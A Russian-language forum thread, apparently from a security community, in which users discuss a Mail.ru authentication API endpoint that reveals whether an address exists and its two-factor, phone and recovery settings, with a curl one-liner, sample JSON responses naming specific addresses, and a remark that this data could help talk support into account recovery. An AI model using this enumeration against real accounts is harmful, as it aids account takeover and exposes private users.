HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Mail(ру) мейл(ru)... wtf...
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.06.2021, 07:10
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию
Ну вроде бы и да, и вроде бы и нет. Ну вы поняли...

.SpoilerTarget" type="button">Spoiler: не рановато комутеры ломать?
хедеры придумаете если что

https://auth.mail.ru/api/v1/pushauth/info

login=salyaev.n@mail.ru

Код:
Code:
{
  "status": 200,
  "htmlencoded": true,
  "email": "salyaev.n@mail.ru",
  "body": {
    "exists": true,
    "twostep": false,
    "can_push": false,
    "alt_email": false,
    "phone": false,
    "trusted": false,
    "available": false,
    "auth": "password",
    "provider": "default",
    "webauthn": [],
    "phones": [],
    "alt_emails": []
  }
}
 
Ответить с цитированием

  #2  
Старый 24.06.2021, 18:25
devton
Участник форума
Регистрация: 26.10.2007
Сообщений: 283
Провел на форуме:
2605910

Репутация: 212
По умолчанию
зобавно...ровно 13 лет тому назад кодеры Рамблера той же ***ней страдали...история идет по спирали

/threads/73611/
 
Ответить с цитированием

  #3  
Старый 24.06.2021, 23:01
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от lifescore  
lifescore said:

вроде бы и нет
Кому-то Not Applicable влепили?

Цитата:
Сообщение от lifescore  
lifescore said:

Ну вроде бы и да
Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но "... не получилось, не фартануло"

Цитата:
Сообщение от lifescore  
lifescore said:

хедеры придумаете если что
Какие? Без шаманств всё работает:

Код:
Code:
curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq




Забавно:
 
Ответить с цитированием

  #4  
Старый 25.06.2021, 08:32
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

Кому-то
Not Applicable
влепили?
Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но
"... не получилось, не фартануло
"
Какие? Без шаманств всё работает:
Код:
Code:
curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq


Забавно:

Всех спалил?)

С учетом как саппорт на recovery работал года два назад, мой мир профиль + эта инфа > 101% success

Про себя не забыли

Код:
Code:
{
  "status": 403,
  "htmlencoded": true,
  "email": "root@mail.ru",
  "body": "forbidden"
}
чур не я
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ